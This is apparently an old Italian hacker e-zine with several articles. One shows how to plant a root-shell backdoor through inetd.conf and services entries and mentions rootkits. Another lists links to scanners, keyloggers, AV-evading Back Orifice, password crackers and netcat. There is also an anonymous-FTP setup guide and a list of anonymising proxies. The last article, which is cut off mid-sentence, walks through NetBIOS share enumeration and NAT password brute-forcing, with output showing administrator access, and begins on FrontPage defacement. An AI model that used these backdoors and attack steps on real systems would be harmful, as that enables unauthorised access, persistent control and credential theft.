ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ DOVE E COME METTERE BACKDOOR ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ ~~)_(~~] Mettiti una porta in culo ! [~~)_(~~ --- Ovvero dove e come mettere backdoor --DISCLAIMER : I non centro un cazzo se vi mettete nei guai con quello scritto qui, bhe..sono cazzi vostri .... io non centro nulla.. Materiale di consumo : 1 lt di latte intero 500 gr di nesquik Saluti : Vecna, Raffiz, |O2|, Harlok, |Killa'|, Bonjo, ]m0f0z[, Nail^d0d, IHC, Skilled, Ghimlet, BlackS_, |{33p3r, er]B0z0[ e infine mamma Telekazz, grazie di esistere, se non ci fossi non sapremmo chi fottere :) Allora allora... Di che dovevo parlare ??? Bho, non mi ricordo piu', spe che guardo il titolo... ...ah ecco, visto... Dunque, cosa sono le backdoor, mo ve lo spiego, se lo sapete gia', saltate questa parte... Dunque, solitamente una volta entrati in un sistema per mantenere l'accesso anche se il sysadmin ci sgama l'account rubato si mettono delle backdoor, che non sono altro che modifiche a file o programmini in background che ci permetterano di rientrare in quel sistema... Ok, non mi dilungo di piu', passiamo al sodo... --] Backdoor nell inetd.conf [-Questa e' una delle backdoor piu' comuni, consiste nell aggiungere un servizio nell inetd.con e nel services molto comoda ed efficace, anche se di facile sgamo. Ora facciamo cosi', apriamo il file inetd.conf e ci aggiungiamo la seguente riga... backdoor stream tcp nowait root /bin/bash bash -i ora aprite il services ed aggiungete... backdoor 5454/tcp ovviamente sostituite le parore backdoor e il numero della porta con quello che volete voi, magari con un servizio inutile ma esistente, tipo echo o discard... Oppure potete fare una copia modificata dell'inetd.conf e del services che tramite un piccolo script eseguito da un crontab che sostituisce i veri file con quelli bacati. Bhe, tutto sta alla vostra immaginazione. Potete usare anche i rootkit, che non sono altro che demoni installati nel sistema, che sono stati modificati, come ad esempio un telnet che se eseguita la login con un user particolare non ci chiede la password... Bhe, sta a voi decidere ora.... ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ QUALCHE MUST HAVE ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ -----------------< fritz presents.... >----------------:qualche must have Ecco a voi un po' di link di robina che si rivela sempre utile in questo campo. Un paio di considerazioni: i link non sono eterni, un paio di settimane fa' funzionavano tutti, ma internet si sa che e' il cantiere piu' grosso che esista, e tutto cambia [o tutto scorre?... mha'... questione filosofiche, ekkekkazzo! hheheh). Seconda nota: alcuni progr fanno riferimento al sito TheArgon e AntiOnline, il primo e' down da una decina di giorni +/-, mentre il secondo, down pure quello fino a qualche giorno fa', si e' ripigliato da poco, ma non ho controllato i collegamenti. In ogni caso, se il link fallisce, sapete il nome del file da cercare, quindi Altavista e/o FtpSearch :) Ok.. via con i link: activex 6, abbastanza indispensabile, credo, per far girare molti programmi (nb: poco piu' di 6 mega) -| http://webmaster.hypermart.net/activex602.zip qualche port scanner -| http://www.tconl.com/~bullzeye/fastscan.zip -| http://www.antionline.com/archives/windows/scan/ogre.zip -| http://www.bullzeye.net/tools/yaps10.zip un bellissimo ip scanner per trovare free proxy (anonimi?) -| http://www.netease.com/~jiangyf/down/proxyht263.exe scanner per trovare server che ancora montano l'amatissimo WinGate -| http://www.theargon.com/defense/GateScan2.2.exe uno scanner per beccare __credo__ PC con netbios e condivisioni -| http://hispahack.ccc.de/programas/smbscanner-eng.zip verifica se il vostro PC e' infettato da moltissime delle backdoor in giro -| ftp://ftp.bashnet.ru/pub/Antinuke/cleaner2.exe un nuker non fa mai male :-) -| http://newdata2.box.sk/neworder/aug04/divint3.zip un paio di telnet un pochino piu' stabili del c:\windows\telnet.exe -| http://spap.cac.washington.edu/project/wwwmm/ewan/ewan1052.exe -| http://www.vandyke.inter.net/pub/CRT/ntcrt23.exe [io preferisco il secondo, ma e' soggettivo] finger, host search, pinger, multi-pinger, whois, finger -| ftp://ftp.euro.net/d4/tucows/files/iptoolb2.exe e-zine carina carina -| http://members.it.tripod.de/ZeroCool/NewBies1.zip [uhmm... pero' se state leggendo questo articolo dubito che questo link serva a molto... mha'... diciamo che serve per rinfrescare la memoria ogni tanto eheheh) avete bisogno per qualche motivo di fare il reboot di un computer remoto? gli mettete il server e col client lo teminate (si, lo so, si puo' fare anche con bo, nb ecc, ma un po' di fantasia con le backdoor ogni tanto! :-)) -| http://www.cheese-reproduction.com/kankan/remote.zip un paio di utilities carine da parte dello staff di Rhino9 la prima devo ancora provarla, ma promette bene, la seconda prova gli exploit classici tipo phf, finger, pwl... -| http://207.98.195.250/software/chroniclev1.zip -| http://www.antionline.com/archives/windows/scan/sitescan.exe key logger, la risorsa estrema :-) -| http://www.cheese-reproduction.com/kankan/hookdump.zip -| http://www.Genocide2600.com/~tattooman/trojans/ik97v12s.exe [io preferisco il secondo, mi sembra meglio fatto, ma l'ho usato pochissimo per ora hihihihi- ] un backorifice invisibile agli antivirus (sii... tutti lamah :-)) -| http://www.cheese-reproduction.com/kankan/lmbo120.zip editors esadecimali -| ftp://volftp.tin.it/pub/pc/windows/win98/progs/editor/binedit/axe.zip -| http://www.AntiOnline.com/archives/windows/hex/hexshop.zip files dizionari divisi per pass da 2 a 8 caratteri -| http://www.confine.com/wordlists/bigdict.zip crackers, ovvero avete per le mani un file di pass criptato e non sapete come affrontarlo -| http://newdata2.box.sk/neworder/NT/l0phtcrack.zip (x pass di WinNT) -| http://www.geocities.com/CollegePark/Lounge/1314/pwltool.zip (x pass di Win95) (dato che il link e' riferito a una pagina di geocities, e' impossibile indovinare per quanto ancora sara' attivo. Al massimo si fa una ricerca per il nome del file pwltool.zip) ancora backdoor -| http://www.cheese-reproduction.com/kankan/Ripper.zip Ripper is a program that can be used to log all of the Dial-Up Networking accounts on a remote computer. The server is distributed to the target machine and when execute listens for a client connection. The Ripper client is used to connect to the remote computer and the details are retrieved. intramontabile NetCAT 1.1 -| http://www.l0pht.com/users/10pht/nc11nt.zip auff... e anche questa e' fatta, sperando che possano servire... La prossima volta aspettatevi un bell'articolo su trojans e backdoors, dove trovarli e cosa fanno... un trojan per ogni occasione insomma eheheheh... Intanto munitevi di quanto sopra elencato... ciao ciao! surfin' fritz ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÿÿ ÿÿÿÿÿÿ ÿÿ ÿÿ ÿÿ ÿÿ øøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøø Linux: Come mettere su un ftp anonimo øøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøø Allora, chi di voi ha sempre desiderato di aprire mettere su un ftp sul proprio computer e non ci e' mai riuscito? Nessuno? Vabbe', cmq io ve lo spiego lo stesso, visto che con Linux questo e' possibile. A prescindere dal fatto che decidiate di fornire un ftp anonimo oppure solo un accesso ftp al sito, dovete comunque svolgere alcune operazioni di configurazione. Per essere certi che gli utenti non ottengano l'accesso ai file sbagliati, dovete rendere attivo e in esecuzione il demone FTP (ftpd) e impostare correttamente i permessi per il filesystem. Inanzitutto, scegliete un nome per il sito. Per utilizzare l'FTP non e' indispensabile avere un nome del sito, ma in questo modo le persone vi troveranno piu' facilmente. La sintassi e' questa: FTP.NOMEDELDOMINIO.TIPODOMINIO NOMEDELDOMINIO si riferisce al nome di dominio del server mentre TIPODOMINIO si riferisce all'estensione DNS (.com , .net etc.) Quando viene effettuata una connessione FTP, il programma segue una procedura suddivisa in cinque fasi per ogni connessione. 1. Login: riceve e controlla il nome utente e la password 2. Definire la directory: identifica la directory di partenza 3. Definire la modalita' di trasferimento: definisce la modalita' di trasferimento da utilizzare 4. Avviare il trasferimento dei dati: permette all'utente di immetere dei comandi 5. Interrompere il trasferimento dei dati: chiude la connessione Per permette al server FTP di gestire queste attivita', occorre impostare il demone FTP, ftpd e configurarlo. Il demone ftpd deve essere avviato sul server FTP. Questa operazione viene di solito eseguita avendo un demone inetd che la gestisce e viene avviata solo quando qualcuno vuole l'FTP. Inetd osserva la porta del comando TCP (porta 21) in attesa che arrivi un pacchetto che richiede una connessione e poi quando arriva un pacchetto attiva in modo dinamico il demone ftpd. Per essere certi che il demone ftpd possa essere avviato da inetd, esaminate il file di configurazione di inetd, che si trova in /etc/inetd.conf , per vedere se e' presente una riga simile alla seguente: ftp stream tcp nowait root /usr/etc/inetd ftpd -l Se non c'e', dovrete aggiungerla. Di solito si trova nella maggior parte delle distribuzioni ma e' anche possibile che la troviate sotto forma di commento (con il segno # davanti), dunque in quel caso basta che togliate il cancelletto (che non e' un cancello piccolo ma il segno #) Per cambiare il comportamento del demone ftpd, potrete aggiungere altre opzioni come -l L'opzione -l puo' essere personalizzata per registrare informazioni diverse sulle attivita' dell'FTP. Se specificate l'opzione -l avrete un file log delle sessioni. Se, invece, lo specificate due volte, avrete anche un file log di tutti i comandi. Se lo specificate tre volte, ottenete anche le dimensioni di tutti i trasferimenti effettuati. Login Se avrete intenzione di impostare un ftp dove ogni utente abbia il proprio login e la propria password, dovrete creare le voci per gni utente nel file /etc/passwd. Se avete intenzione di non fornire un accesso anonimo, non create login troppo semplici che chiunque potrebbe utilizzare. Se avrete intenzioni di offrire connessioni con login anonimo, dovrete creare un login per l'ID utente anonimo. Questo login potrebbe gia' essere presente e quindi controllate se esiste nel file /etc/passwd. Potrebbe assomigliare alla seguente: ftp:*:400:51:Anonymous FTP access:/usr/ftp:/bin/false Questa sintassi imposta l'utente anonimo con un login di FTP, un numero utente di 400, un numero di ID di gruppo e una directory di login. Sarebbe meglio assegnare gli utenti anonimi a un gruppo separato modificando il file /etc/group e creando un nuovo gruppo. Poi, potete impostare l'utente FTP per quel gruppo. Se gli utenti FTP hanno un unico gruppo, diventa piu' facile impostare i permessi e limitare l'accesso al sistema. Directory Nei limiti del possibile, sarebbe meglio avere le sottodirectory degli utenti anonimi come un filesystem separato, senza alcuna possibilita' per l'utente anonimo di andare da qualche altra parte tranne che nella sottodirectory designata a quello scopo. Quindi, dovete creare un filesystem in miniatura per l'utente FTP anonimo. Ecco come impostare le directory: 1. 2. 3. 4. 5. Create Create Create Create Create le la la la la directory directory directory directory directory /bin /etc /lib /pub /dev (come /usr/ftp/bin) e copiatevi il comando ls e copiatevi i vostri file /etc/passwd e /etc/group e copiatevi i file /lib/id.so e /libc.so.xx per contenere i file accessibili Le copie dei file /etc/passwd e /etc/group che sono state copiate nella directory /etc dell'FTP devono essere modificate per sostituire qualunque password con un asterisco. Nei file /etc/passwd e /etc/group devono essere eliminate tutte le voci, tranne quelle che appartengono ai login FTP anonimi in modo da vere maggiore sicurezza La directory /pub ,invece, puo' essere utilizzata per memorizzare i file che volete rendere accessibili dagli utenti anonimi. Questa directory puo' essere suddivisa in sottodirectory e i file che volete che l'utente anonimo abbia possono essere semplicemente copiati. Sicurezza Siamo hackers ed abbiamo nemici hackers. Se qualcuno digita il comando rm -rf /* siamo fottuti! Ed e' per questo motivo che dovete utilizzare il comando chroot per fare apparire la directory root qualcosa di diverso dalla directory effettiva /. Se la directory e' impostata a /usr/-ftp/ con chroot, l'utente puo' essere mantenuto all'interno della struttura dlla directory -ftp e puo' essere negato l'accesso al sistema. Per impostare i permessi della directory in modo che abbia solo i permessi di lettura e esecuzione, utilizzate il seguente comando: chmod 555 nome_dir Dopo aver fatto tutto cio' provatevi a connetervi al vostro sistema via ftp e fate un test. Se avete settato bene i permessi e non riuscirete ad accedere alla directory root, significa che il vostro ftp e' ok. Qui di seguito vi riporto un elenco di cose da fare per far funzionare meglio l'FTP: 1. Create un account utente sul sistema denominato FTP 2. Impostate la directory home per l'utente ftp /home/ftp 3. Rendete il root proprietario della directory home FTP con il comando chown root /usr/ftp 4. Utilizzate il comando chmod ugo -w /usr/ftp per non permettere a nessuno di scrivere nella directory home dell'FTP 5. Create una directory /bin nella directory home /ftp e rendetela non scrivibile e di proprieta' di root con i comandi chown e chmod utilizzati in precedenza 6. Create una directory /etc e rendetela non scrivibile e di proprieta' di root 7. Inserite i file /etc/passwd e /etc/group nella directory /ftp/etc e modificateli per eliminare tutto tranne l'utente ftp e group 8. Create la directory -ftp/pub/incoming e rendetela scrivibile da chiunque e di proprieta' di root Ora potete mettere su un bell'FTP. Mi raccomando chi fra voi lo mettera', mi contatti ed io saro' molto contento di vederlo. Vi serve un elenco dei comandi ftp? No problem, eccoli! ________________________________________________________________________ COMANDO AZIONE -----------------------------------------------------------------------ASCII Seleziona la modalita' di trasferimento ASCII -----------------------------------------------------------------------BINARY Seleziona la modalita' di trasferimento binaria -----------------------------------------------------------------------CD Passa a una directory sul server FTP -----------------------------------------------------------------------CLOSE Chiude la connessione -----------------------------------------------------------------------DEL Cancella i file sul server -----------------------------------------------------------------------DIR Visualizza la directory del server -----------------------------------------------------------------------GET Scarica i file dal server -----------------------------------------------------------------------HASH Elenca il progesso della trasmissione -----------------------------------------------------------------------HELP Guida -----------------------------------------------------------------------ICD Passa alla directory sulla macchina client -----------------------------------------------------------------------MGET Serve per scaricare piu' file dall'FTP -----------------------------------------------------------------------MPUT Trasferisce piu' file sull'FTP -----------------------------------------------------------------------OPEN Si connette al server -----------------------------------------------------------------------PUT Carica un file sul server -----------------------------------------------------------------------PWD Visualizza la directory attiva del server -----------------------------------------------------------------------QUOTE Fornisce direttamente un comando FTP -----------------------------------------------------------------------QUIT Conclude una sessione FTP ________________________________________________________________________ Ecco fatto! Si e' concluso anche quest'altro articolo. Che fatica! (-:(-:(-:(-NICK--):-):-):-) (-:(-:(-:T0rment0 :-):-):-) (-:(-:(-:(-:MAIL-):-):-):-) (-:(-:[email protected] :-) (-:(-:(-:(-HOME--):-):-):-) (-:come.to/hackernovello:-) (-:(-:(-:(-::-):-):-):-):-) ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ LISTA DI PROXY ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Consumo: 3 Gauloise blu che a detta di kualcuno spakkano (e a me a letto con l'australiana hanno spakkato sicuramente) Da mangiare niente perche' non e' il mio massimo desiderio mangiare con 40 di frebbe ---------------------------------------------------------------------------Ebbene si', vi ricordate tutti quegli amati computer che sono tanto gentili da nascondere il vostro piccolo e numerico IP???? Ebbene per soddisfare i gusti di tutte quelle brave persone che per un motivo o un altro sono costretti a non lasciare tracce in giro per la rete, ecco una lista piu' aggiornata della precedente di proxy server che non aspettano altro che teneri e piccoli IP da mascherare. Mi raccomando, non ho ancora potuto provarli per cause di forza maggiore, percio' non venite a reclamare al mio indirizzo se qualcuno di questi non funziona. Server porta noc.uncu.edu.ar proxy.co.rmit.edu.au conan.gocis.bg proxy.intermedia.cl webcache.ms.mff.cuni.cz proxye1-atm.maine.rr.com infosun-fd.rus.uni-stuttgart.de linux.softec.es nivel.ttaol.fi proxy.galactica.it www.go.com.jo zip-translator.dna.affrc.go.jp cvs2.kyunghee.ac.kr magicall2.dacom.co.kr proxy1.jaring.my mpls.cache.mr.net w3cache.us.edu.pl sunsite.icm.edu.pl proxy.qatar.net.qa bill.ostrabo.uddevalla.se proxy1.turnet.net.tr proxy2.turnet.net.tr episd.elpaso.k12.tx.us proxy.telekom.yu proxy.cybergate.co.zw cache.connect.ab.ca cache.sh.cvut.cz server.librarysafe.com proxy.silcom.com: cache2.nlanr.pa-x.dec.com cache.vossnet.de otsun1f.dss.dornier.dasa.de dos2.esegi.es www-cache.kolumbus.fi proxy.spidernet.it sama.isc.kyutech.ac.jp proxy.kren.nm.kr proxy.snu.ac.kr proxy.intnet.mu chip.Austria.EU.net proxy.knoware.nl proxy.lofotposten.no proxy.silk.org proxy.starnets.ro proxy.salekhard.ru hammer.overta.ru news.ntu.edu.sg yav.yacc.yakutia.su instanet.edex.net.uk dilbert.bb.cc.wa.us cache.new.co.za proxy.fh-reutlingen.de proxy1.rrze.uni-erlangen.de ics2f.s.srv.t-online.de infosun-fd.rus.uni-stuttgart.de www-cache.bosm.de rena.zfn.uni-bremen.de mordell.uni-muenster.de wwwproxy.allgaeu.org 8080 8080 8080 8080 8080 8080 8080 8080 8080 8080 8080 3000 8080 8080 3128 3128 8080 8080 8080 8080 8080 8080 8080 8080 8080 3128 3128 81 3128 3128 3128 3128 3128 8080 8080 8080 8080 8080 8080 8080 8000 80 3128 3128 3333 3128 8080 8080 3128 3128 8080 3128 80 80 8080 3128 3128 3128 80 Arrivederci e mi raccomando non divertitevi troppo eh!?!?!?! SCIAMAN ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ HACKING di WINDOZZO NT ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ I. Strategie di Accesso (siamo all'inizio !) 1.) Condivisioni NetBIOS usando gli eseguibili Microzoz ! a. Gli altri usi di NET.EXE 2.) NAT: The NetBIOS Auditing Tool II. Exploitiamo FrontPage 1.) Decriptazione delle Password di FrontPage su un server UNIX con le estenzioni FRONTPAGE (Ahiahiahi !!!) III. Vulnerabilita' nel registro di (s)configurazione ! 1.) rdisk /s e famo un CORE DUMP (alla UNIX !) sul SAM (Security Account Manager) 2.) ottenere l'accesso al registro con il comando at.exe in locale ! :( 3.) REGEDT32.EXE e REGEDIT.EXE 4.) REGINI.EXE e REGDMP.EXE: Remote Registry Editing Tools 5.) Usiamo il registro per eseguire cose non volute dal SYS !! Hihi IV. Figli di Troia: .lnk (collegamento, shortcuts) 1.) Piccoli problemi di (in)sicurezza di winnt\profiles e degli script di login ! V. Varie ed Eventuali (ma che e' l'assemblea di classe ?? Mah !) ======================================================================= I. Strategie di Accesso (siamo all'inizio !) C:\>NBTSTAT -A 123.123.123.123 C:\>NBTSTAT -a www.target.com NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------STUDENT1 <20> UNIQUE Registered STUDENT1 <00> UNIQUE Registered DOMAIN1 <00> GROUP Registered DOMAIN1 <1C> GROUP Registered DOMAIN1 <1B> UNIQUE Registered STUDENT1 <03> UNIQUE Registered DOMAIN1 <1E> GROUP Registered DOMAIN1 <1D> UNIQUE Registered ..__MSBROWSE__.<01> GROUP Registered MAC Address = 00-C0-4F-C4-8C-9D Yeah, dopo che abbiamo trovato un po' di condivisioni, possiamo aggiungerle al file LMHOSTS. Esempio di LHOSTS file: 123.123.123.123 24.3.9.12 student1 target2 Ora possiamo usare o explorer per farci na navigata nelle direttori condivise oppure usare NET.EXE: C:\>net view 123.123.123.123 C:\>net view \\student1 RISORSE CONDIVISE IN 123.123.123.123 Share name Type Used as Comment -----------------------------------------------------------------------------NETLOGON Disk Logon server share Test Disk The command completed successfully. NOTA DI COLORE NERO: C$, ADMIN$ e IPC$ che sono condivisi non sono visibili perche' NASCOSTI, HIDDEN... :( C:\net use x: \\123.123.123.123\test The command completed successfully. Ora possiamo usare EXPLORER per accedere remotamente alla direttori condivisa nel drive x: C:\net use New connections will be remembered. Status Local Remote Network ------------------------------------------------------------------------------OK X: \\123.123.123.123\test Microsoft Windows Network OK \\123.123.123.123\test Microsoft Windows Network The command completed successfully. NET.EXE, vediamo cos'altro puo' fare... elencando alcuni comandi utili utili :) NET localgroup <enter> mostrera' quali gruppi sono stati creati su quella macchina ! NET name <enter> mostrera' il nome del PC con cui siamo loggati ! NET accounts <enter> mostrera' il passwd con le resistrizioni per gli utenti NET share <enter> mostrera' tutte le condivisioni coprese le $ che dovrebbero essere HIDDEN ! NET user <enter> mostrera' gli account creati.. Puo' essere utile quando si aggiunge un utente al NAT per fare BRUTE FORCE delle condivisioni ! NET start SERVICE. Per esempio NET start SCHEDULE fara' partire l'utility di scheduling che puo' essere usato per accedere completamente al registro su una macchina locale ! Questi sono i comandi fondamentali da conoscere di NET.. ---- NAT ---NAT (NetBIOS Auditing Tool) Questa tecnica si basa sull'uso delle condivisioni ad accesso EVERYONE cioe' permessi per chiunque altrimenti sara' necessario inserire una password... In pratica e' la stessa tecnica che si usa su UNIX per montare sul proprio sistema degli export concessi a chiunque !!! NAT.EXE (NetBIOS Auditing Tool) NAT.EXE [-o filename] [-u userlist] [-p passlist] <address> OPTIONS -o -u Specify the output file. All results from the scan will be written to the specified file, in addition to standard output. Specify the file to read usernames from. Usernames will be read from the specified file when attempting to guess the password on the remote server. Usernames should appear one per line in the specified file. -p Specify the file to read passwords from. Passwords will be read from the specified file when attempting to guess the password on the remote server. Passwords should appear one per line in the specified file. <address> Addresses should be specified in comma deliminated format, with no spaces. Valid address specifications include: hostname - "hostname" is added 127.0.0.1-127.0.0.3, adds addresses 127.0.0.1 through 127.0.0.3 127.0.0.1-3, adds addresses 127.0.0.1 through 127.0.0.3 127.0.0.1-3,7,10-20, adds addresses 127.0.0.1 through 127.0.0.3, 127.0.0.7, 127.0.0.10 through 127.0.0.20. hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1 through 127.0.0.1 All combinations of hostnames and address ranges as specified above are valid. NAT.EXE fa tutto quello che e' necessario per riuscire ad ottenere l'accesso alle direttori dell'amministratore, scansiona un range IP e usa un dizionario per crakkare le password del NetBIOS. Come dire.. NAT e' il TOOL preferito da molti HACKERS.... Come nota vorrei aggiungere che uno strumento del genere esiste anche per ambiente UNIX-LIKE il noto sscan. Questo oltre a controllare vulnerabilita' di UNIX, controlla, se lo trova, anche le vulnerabilita' di NT eseguendo le stesse procedure di NAT. Quindi.. MEDITARE... C:\GAMEZ\HACKING\TOOLS\nat -o vacuum.txt -u userlist.txt -p passlist.txt 204.73.131.10-204.73.131.30 [*]--- Reading usernames from userlist.txt [*]--- Reading passwords from passlist.txt [*]--- Checking host: 204.73.131.11 [*]--- Obtaining list of remote NetBIOS names [*]--- Attempting to connect with name: * [*]--- Unable to connect [*]--[*]--[*]--[*]--[*]--[*]--- Attempting to connect with name: *SMBSERVER CONNECTED with name: *SMBSERVER Attempting to connect with protocol: MICROSOFT NETWORKS 1.03 Server time is Mon Dec 01 07:44:34 1997 Timezone is UTC-6.0 Remote server wants us to encrypt, telling it not to [*]--[*]--[*]--[*]--[*]--[*]--- Attempting to connect with name: *SMBSERVER CONNECTED with name: *SMBSERVER Attempting to establish session Was not able to establish session with no password Attempting to connect with Username: `ADMINISTRATOR' Password: `password' CONNECTED: Username: `ADMINISTRATOR' Password: `password' [*]--- Obtained server information: Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[] [*]--- Obtained listing of shares: Sharename --------ADMIN$ Type ---Disk: Comment ------Remote Admin C$ IPC$ NETLOGON Test Disk: IPC: Disk: Disk: Default share Remote IPC Logon server share [*]--- This machine has a browse list: Server --------STUDENT1 Comment ------- [*]--- Attempting to access share: \\*SMBSERVER\ [*]--- Unable to access [*]--[*]--[*]--[*]--[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$ WARNING: Able to access share: \\*SMBSERVER\ADMIN$ Checking write access in: \\*SMBSERVER\ADMIN$ WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$ Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$ [*]--[*]--[*]--[*]--[*]--- Attempting to access share: \\*SMBSERVER\C$ WARNING: Able to access share: \\*SMBSERVER\C$ Checking write access in: \\*SMBSERVER\C$ WARNING: Directory is writeable: \\*SMBSERVER\C$ Attempting to exercise .. bug on: \\*SMBSERVER\C$ [*]--[*]--[*]--[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON WARNING: Able to access share: \\*SMBSERVER\NETLOGON Checking write access in: \\*SMBSERVER\NETLOGON Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON [*]--[*]--[*]--[*]--- Attempting to access share: \\*SMBSERVER\Test WARNING: Able to access share: \\*SMBSERVER\Test Checking write access in: \\*SMBSERVER\Test Attempting to exercise .. bug on: \\*SMBSERVER\Test [*]--- Attempting to access share: \\*SMBSERVER\D$ [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\ROOT [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\WINNT$ [*]--- Unable to access P.S. Notare come l'output sia proprio uguale a quello mostrato da SSCAN.... quindi FUCK WIN ! ======================================================================= II. Exploitiamo FrontPage La maggior parte degli exploit per Microsoft FrontPage ci daranno accesso a wwwroot e quindi ci permetteranno solo di cambiare le pagine HTML (mi dici niente !) che in pratica e' la tecnica usata da molti HACKERS (?? Come quelli che intendiamo noi ?? Mah !) per rendersi famosi.. vedi l'ultimo attakko al sito www.alt2600.com (azz Hack vs. Hack.. mih na chiavica !) Iniziamo con un piccolo esempio di quello che si potrebbe trovare nella direttori remota di un server che fa girare le estensioni server di frontpage BAGGATO !! C:\InetPub\wwwroot C:\InetPub\scripts C:\InetPub\wwwroot\_vti_bin C:\InetPub\wwwroot\_vti_bin\_vti_adm C:\InetPub\wwwroot\_vti_bin\_vti_aut C:\InetPub\cgi-bin C:\InetPub\wwwroot\srchadm <Home> /Scripts /_vti_bin /_vti_bin/_vti_adm /_vti_bin/_vti_aut /cgi-bin /srchadm C:\WINNT\System32\inetserv\iisadmin /iisadmin C:\InetPub\wwwroot\_vti_pvt C:\InetPub\wwwroot\samples\Search\QUERYHIT.HTM Internet Information Index Server sample C:\Program Files\Microsoft FrontPage\_vti_bin C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_aut C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_adm C:\WINNT\System32\inetserv\iisadmin\htmldocs\admin.htm /iisadmin/isadmin Ora usando l'amico Frontpage, un hacker... o meglio ora anche un pivello ! potrebbe alterare il contenuto delle pagine HTML su un sito remoto... e la cosa piu' bella e' che spesso sti server sono senza pAsSwOrD... Vabbe lavoro in meno ! :) Vabbe ora faccio un esempio con l'uso di WinCoz... ma vabbe.. non si muore.. dai Win e' bello !! soprattutto quando mi dice "L'applicazione XXX ha commesso un errore di protezione generale" o "Il sistema e' diventato instabile"... ma Bill non avra' fatto i test ?? Mah ... tralasciando... OCCORRENTE: Microsoft FrontPage Explorer installato sul proprio sistema. Un sito WEB con un Sys MicroDipendente e particolarmente incapace :) <FONDAMENTALE PREMESSA COSUMAZIONE: Danet Danone Gusto a 